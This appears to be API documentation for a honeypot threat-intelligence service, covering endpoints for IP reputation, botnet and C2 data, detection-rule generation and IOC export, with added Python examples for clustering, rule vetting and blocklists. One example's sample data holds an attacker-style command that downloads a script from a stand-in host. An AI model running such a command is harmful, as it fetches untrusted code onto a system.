REST API with 38+ documented endpoints for querying NadSec honeypot threat intelligence. No authentication required.
https://api.nadsec.online
No API key required. Public access.
100 requests/minute per IP
Global search and IP threat correlation
Multi-category global search across IPs, botnets, C2 servers, commands, countries, orgs, ports, and malware hashes. Supports IP prefix/subnet matching.
q (string, required): Search query - IP, hash, botnet name, command, country, org, or port number
hours (integer): Time window in hours (default: 168, max: 720)
limit (integer): Max results per category (default: 20, max: 200)
curl "https://api.nadsec.online/api/search?q=mirai&hours=168&limit=10"
Full IP correlation: related botnets, C2 infrastructure, malware, commands, and activity timeline.
ip (string, required): IPv4 address
hours (integer): Time window in hours (default: 168, max: 720)
curl "https://api.nadsec.online/api/correlate/ip/185.220.101.1?hours=720"
Threat intelligence for specific IPs and top threats
Get comprehensive threat data for a specific IP including threat score, honeypots triggered, ports targeted, and daily activity.
ip (string, required): IPv4 address
hours (integer): Time window in hours (default: 720)
curl "https://api.nadsec.online/api/ip/185.220.101.1?hours=720"
Full IP reputation scoring with weighted components: frequency, persistence, diversity, spread, and recency.
ip (string, required): IPv4 address
hours (integer): Time window in hours (default: 720, max: 2160)
curl "https://api.nadsec.online/api/ip/185.220.101.1/reputation?hours=720"
Top threat IPs ranked by activity volume, with geo/org/port metadata.
hours (integer): Time window in hours (default: 24, max: 720)
limit (integer): Max results (default: 20, max: 1000)
curl "https://api.nadsec.online/api/ip/top-threats?hours=168&limit=20"
Bulk IP lookup - up to 100 IPs per request. Returns threat data for each IP.
ips (string[], required): Array of IPv4 addresses (max 100)
hours (integer): Time window in hours (default: 720)
curl -X POST "https://api.nadsec.online/api/ip/bulk" -H "Content-Type: application/json" -d '{"ips": ["1.2.3.4", "5.6.7.8"]}'
Bulk IP reputation scoring - up to 100 IPs per request. Returns reputation scores with weighted components.
ips (string[], required): Array of IPv4 addresses (max 100)
hours (integer): Time window in hours (default: 720)
curl -X POST "https://api.nadsec.online/api/ip/reputation/bulk" -H "Content-Type: application/json" -d '{"ips": ["1.2.3.4", "5.6.7.8"]}'
Campaign clustering and automated detection rule generation
Indicator-first campaign clustering - discovers related IPs through shared infrastructure (subnets, C2, botnets, commands), then merges via union-find. Guarantees monotonicity.
hours (integer): Time window in hours (default: 168, max: 720)
min_ips (integer): Minimum IPs to form a campaign (default: 3, min: 1)
limit (integer): Max campaigns (default: 20, max: 100)
curl "https://api.nadsec.online/api/intel/campaigns?hours=168&min_ips=2"
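An added example, not NadSec's code: indicator-first clustering with union-find as this endpoint describes it, in Python. The observation tuples are constructed, the /24 subnet size is an assumption (the page does not state one), and monotonicity is read here as "adding observations can only grow or merge campaigns, never split them".

```python
from collections import defaultdict
from ipaddress import ip_network

# Constructed observations: (source IP, indicator kind, indicator value).
OBSERVATIONS = [
    ("192.0.2.10", "c2", "203.0.113.5"),
    ("198.51.100.20", "c2", "203.0.113.5"),
    ("192.0.2.44", "botnet", "mirai"),
    ("198.51.100.77", "command", "cd /tmp; wget http://203.0.113.5/a.sh"),
    ("203.0.113.200", "botnet", "gafgyt"),
]

class UnionFind:
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra

def cluster(observations, min_ips=3, prefix=24):
    """Merge IPs that share any indicator; prefix=24 is an assumed subnet size."""
    by_indicator = defaultdict(set)
    for ip, kind, value in observations:
        by_indicator[(kind, value)].add(ip)
        subnet = str(ip_network(f"{ip}/{prefix}", strict=False))
        by_indicator[("subnet", subnet)].add(ip)
    uf = UnionFind()
    for ips in by_indicator.values():
        first, *rest = sorted(ips)
        uf.find(first)  # registers IPs that share nothing with anyone
        for other in rest:
            uf.union(first, other)
    groups = defaultdict(set)
    for ip in list(uf.parent):
        groups[uf.find(ip)].add(ip)
    # min_ips mirrors the endpoint's parameter: smaller groups are dropped.
    return sorted(sorted(g) for g in groups.values() if len(g) >= min_ips)
```

Because union-find only ever merges sets, every campaign found on a subset of the observations is contained in a campaign found on the full set.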
Auto-generate Snort, Sigma, YARA, and Suricata rules from live honeypot data. SID range: 9900000-9999999.
rule_type (string): ip_blocklist, c2_detection, malware_detection, credential_bruteforce, or all (default: all)
format (string): snort, sigma, yara, suricata, or all (default: all)
hours (integer): Time window in hours (default: 168, max: 720)
min_hits (integer): Minimum hits to include (default: 5, max: 1000)
limit (integer): Max rules per type (default: 50, max: 500)
curl "https://api.nadsec.online/api/intel/rules?rule_type=c2_detection&format=snort&hours=168"
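An added example, not part of the NadSec documentation: a Python check to run on fetched Snort/Suricata rules before loading them into a sensor, enforcing the documented SID range and rejecting SID collisions. The sample rules are constructed, one rule per line is an assumed response layout, and the alert-only policy is a local choice rather than something the API states.

```python
import re

SID_MIN, SID_MAX = 9900000, 9999999  # range documented for this endpoint
ALLOWED_ACTIONS = {"alert"}          # assumption: a feed may alert, never pass/drop
SID_RE = re.compile(r"\bsid\s*:\s*(\d+)\s*;")

# Constructed sample standing in for rule text fetched with format=snort.
SAMPLE_RULES = """\
# generated rules (constructed sample)
alert tcp 203.0.113.5 any -> $HOME_NET any (msg:"C2 traffic"; sid:9900001; rev:1;)
alert tcp $HOME_NET any -> 203.0.113.9 80 (msg:"C2 callback"; sid:9900002; rev:1;)
alert tcp 198.51.100.7 any -> $HOME_NET 22 (msg:"SSH brute force"; sid:1000001; rev:1;)
pass tcp 192.0.2.1 any -> $HOME_NET any (msg:"odd"; sid:9900003; rev:1;)
alert tcp 192.0.2.8 any -> $HOME_NET 23 (msg:"dup"; sid:9900001; rev:2;)
alert tcp 192.0.2.9 any -> $HOME_NET 23 (msg:"no sid"; rev:1;)
"""

def vet_rules(text, local_sids=frozenset()):
    """Split fetched rules into (accepted rules, [(rule, rejection reason)])."""
    accepted, rejected, seen = [], [], set(local_sids)
    for line in text.splitlines():
        rule = line.strip()
        if not rule or rule.startswith("#"):
            continue
        action = rule.split(None, 1)[0]
        sids = SID_RE.findall(rule)
        if action not in ALLOWED_ACTIONS:
            reason = f"action {action!r} not allowed"
        elif len(sids) != 1:
            reason = "expected exactly one sid"
        elif not SID_MIN <= int(sids[0]) <= SID_MAX:
            reason = f"sid {sids[0]} outside documented range"
        elif int(sids[0]) in seen:
            reason = f"sid {sids[0]} already in use"
        else:
            seen.add(int(sids[0]))
            accepted.append(rule)
            continue
        rejected.append((rule, reason))
    return accepted, rejected
```

Pass the SIDs already present in the local rule set as `local_sids` so a fetched rule cannot shadow an existing one.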
Track emerging threats and activity spikes vs baseline
Compare recent activity against a historical baseline to surface NEW IPs and SPIKING threats.
hours (integer): Recent window to analyze (default: 24, max: 720)
baseline_hours (integer): Baseline window for comparison (default: 168, max: 720)
curl "https://api.nadsec.online/api/trending?hours=24&baseline_hours=168"
Real-time attack events for map visualization. Returns geo-located events with type/country/port breakdowns.
minutes (integer): Time window in minutes (default: 5, max: 60)
limit (integer): Max events (default: 200, max: 500)
country (string): Filter by country name
type (string): Filter by honeypot type
port (integer): Filter by destination port
curl "https://api.nadsec.online/api/live-attacks?minutes=5&limit=100"
Aggregate attack statistics and breakdowns
Aggregate stats: total attacks, unique IPs, breakdowns by type, country, port, org.
hours (integer): Time window in hours (default: 24, max: 720)
curl "https://api.nadsec.online/api/stats/summary?hours=168"
Today's stats (Sydney timezone) with hourly breakdown.
curl "https://api.nadsec.online/api/stats/today"
Rolling window stats for specified minutes.
minutes (integer): Window in minutes (default: 60, max: 1440)
country (string): Filter by country
type (string): Filter by honeypot type
curl "https://api.nadsec.online/api/stats/rolling?minutes=60"
Last 24 hours stats with hourly timeline.
curl "https://api.nadsec.online/api/stats/rolling24h"
MITRE ATT&CK technique/tactic statistics mapped from honeypot and port data.
hours (integer): Time window in hours (default: 24, max: 720)
curl "https://api.nadsec.online/api/stats/mitre?hours=168"
C2 servers, botnets, malware, and credential data - all dynamically extracted from honeypot events
Dynamically extracted C2 server IPs from wget/curl/http commands in honeypot sessions. Zero hardcoded IPs.
hours (integer): Time window in hours (default: 720, max: 2160)
curl "https://api.nadsec.online/api/threat-intel/c2?hours=168"
3-tier botnet detection: signature keywords (high), behavioral patterns (medium), auto-extracted binaries (low), plus dynamic C2 IP correlation.
hours (integer): Time window in hours (default: 720, max: 2160)
curl "https://api.nadsec.online/api/threat-intel/botnets?hours=168"
Unique SHA256 hashes of malware samples captured by honeypots.
hours (integer): Time window in hours (default: 720, max: 2160)
limit (integer): Max results (default: 50, max: 200)
curl "https://api.nadsec.online/api/threat-intel/malware-hashes?hours=168&limit=50"
Malware download URLs extracted from attack commands.
hours (integer): Time window in hours (default: 720, max: 2160)
limit (integer): Max results (default: 50, max: 500)
curl "https://api.nadsec.online/api/threat-intel/malware-urls?hours=168"
IPs that have dropped malware samples (have SHA256 hashes in logs).
hours (integer): Time window in hours (default: 720, max: 2160)
limit (integer): Max results (default: 50, max: 500)
curl "https://api.nadsec.online/api/threat-intel/malware-droppers?hours=168"
Alternative malware hash endpoint - returns SHA256 hashes of captured samples with hit counts and first/last seen timestamps.
hours (integer): Time window in hours (default: 720, max: 2160)
limit (integer): Max results (default: 50, max: 200)
curl "https://api.nadsec.online/api/malware/hashes?hours=168"
Top username/password combinations from brute-force attempts on SSH/Telnet honeypots.
hours (integer): Time window in hours (default: 168, max: 720)
limit (integer): Max results (default: 20, max: 500)
curl "https://api.nadsec.online/api/credentials/top?hours=168"
Top commands executed by attackers, with botnet detection and download/persistence flags.
hours (integer): Time window in hours (default: 168, max: 720)
limit (integer): Max results (default: 30, max: 500)
curl "https://api.nadsec.online/api/commands/top?hours=168&limit=20"
Ports, protocols, countries, organizations, honeypot types, Suricata IDS, and MITRE mappings
Top targeted ports with MITRE ATT&CK technique mappings.
hours (integer): Time window in hours (default: 24, max: 720)
limit (integer): Max results (default: 20, max: 500)
curl "https://api.nadsec.online/api/ports/top?hours=168"
Protocol breakdown from network analysis.
hours (integer): Time window in hours (default: 168, max: 720)
curl "https://api.nadsec.online/api/protocols?hours=168"
Attack source countries ranked by event count.
hours (integer): Time window in hours (default: 24, max: 720)
curl "https://api.nadsec.online/api/countries?hours=168"
Top attacking organizations/ISPs, optionally filtered by country.
hours (integer): Time window in hours (default: 24, max: 720)
country (string): Filter by country name
curl "https://api.nadsec.online/api/orgs?hours=168&country=China"
List all honeypot types with display colors.
curl "https://api.nadsec.online/api/types"
Top Suricata IDS alert signatures with categories and severity.
hours (integer): Time window in hours (default: 168, max: 720)
limit (integer): Max results (default: 50, max: 200)
curl "https://api.nadsec.online/api/suricata/signatures?hours=168"
Full MITRE ATT&CK technique listing with honeypot and port mappings.
curl "https://api.nadsec.online/api/mitre/techniques"
Raw attack event data
Latest attack events with full geo and honeypot metadata.
limit (integer): Max events (default: 100, max: 500)
country (string): Filter by country
type (string): Filter by honeypot type
port (integer): Filter by port
curl "https://api.nadsec.online/api/attacks/latest?limit=50&type=ssh"
Total attack count for a time window with optional filters.
hours (integer): Time window in hours (default: 24, max: 720)
country (string): Filter by country
type (string): Filter by honeypot type
port (integer): Filter by port
curl "https://api.nadsec.online/api/attacks/count?hours=24"
Export threat intel in STIX 2.1 and CSV formats for SIEM, firewall, and threat intel platform integration
Export IOCs in STIX 2.1 bundle format. Compatible with TAXII servers, OpenCTI, MISP.
hours (integer): Time window in hours (default: 24, max: 720)
ioc_type (string): IOC type: ip, hash, url, or all (default: ip)
limit (integer): Max IOCs (default: 100, max: 5000)
curl "https://api.nadsec.online/api/export/stix?hours=24&ioc_type=all&limit=500"
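An added example, not from the NadSec documentation: turning a STIX 2.1 bundle into a firewall blocklist in Python while refusing addresses that must never be blocked. The bundle is constructed (it reuses the page's 1.2.3.4 and 5.6.7.8 placeholders), the use of `indicator` objects with `ipv4-addr` patterns is an assumption about the export's layout, and the `never_block` parameter is hypothetical.

```python
import ipaddress
import json
import re

IPV4_PATTERN = re.compile(r"ipv4-addr:value\s*=\s*'([^']+)'")

def indicator(pattern):
    # Abbreviated STIX 2.1 indicator; ids and timestamps left out of the sample.
    return {"type": "indicator", "spec_version": "2.1",
            "pattern_type": "stix", "pattern": pattern}

# Constructed bundle; the real export's object layout is assumed.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000000",
    "objects": [
        indicator("[ipv4-addr:value = '1.2.3.4']"),
        indicator("[ipv4-addr:value = '5.6.7.8']"),
        indicator("[ipv4-addr:value = '10.0.0.5']"),
        indicator("[ipv4-addr:value = 'not-an-ip']"),
        indicator("[file:hashes.'SHA-256' = '<placeholder>']"),
        {"type": "identity", "name": "constructed"},
    ],
})

def blocklist_from_stix(bundle_json, never_block=()):
    """Return (blockable IPv4 strings, skipped (value, reason) pairs)."""
    bundle = json.loads(bundle_json)
    if bundle.get("type") != "bundle":
        raise ValueError("not a STIX bundle")
    protected = [ipaddress.ip_network(n) for n in never_block]
    block, skipped = [], []
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type") != "stix":
            continue
        for value in IPV4_PATTERN.findall(obj.get("pattern", "")):
            try:
                addr = ipaddress.IPv4Address(value)
            except ValueError:
                skipped.append((value, "not a valid IPv4 address"))
                continue
            if not addr.is_global:
                skipped.append((str(addr), "not globally routable"))
            elif any(addr in net for net in protected):
                skipped.append((str(addr), "inside a protected network"))
            elif str(addr) not in block:
                block.append(str(addr))
    return block, skipped
```

List your own egress, VPN and partner ranges in `never_block` so an entry in a public feed cannot cut off traffic you depend on.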
Export IOCs as CSV for firewall rules, SIEM ingestion, or spreadsheet analysis.
hours (integer): Time window in hours (default: 24, max: 720)
ioc_type (string): IOC type: ip, hash, url, or c2 (default: ip)
limit (integer): Max IOCs (default: 500, max: 5000)
curl "https://api.nadsec.online/api/export/csv?hours=24&ioc_type=ip&limit=500" -o threat-ips.csv
import requests

# Get top threats
resp = requests.get(
    "https://api.nadsec.online/api/ip/top-threats",
    params={"hours": 24, "limit": 10},
    timeout=10,  # do not hang indefinitely if the API is unreachable
)
resp.raise_for_status()  # stop on HTTP error responses instead of parsing them
data = resp.json()
for threat in data["threats"]:
    print(f"{threat['ip']}: {threat['events']} events - score {threat['threat_score_estimate']}")

// Search for Mirai botnets (top-level await: run as an ES module)
const resp = await fetch(
  "https://api.nadsec.online/api/search?q=mirai&hours=168&limit=10"
);
const data = await resp.json();
// Print each matching botnet with its hit count and type
data.results.botnets.items.forEach(b => {
  console.log(`${b.name}: ${b.hits} hits [${b.type}]`);
});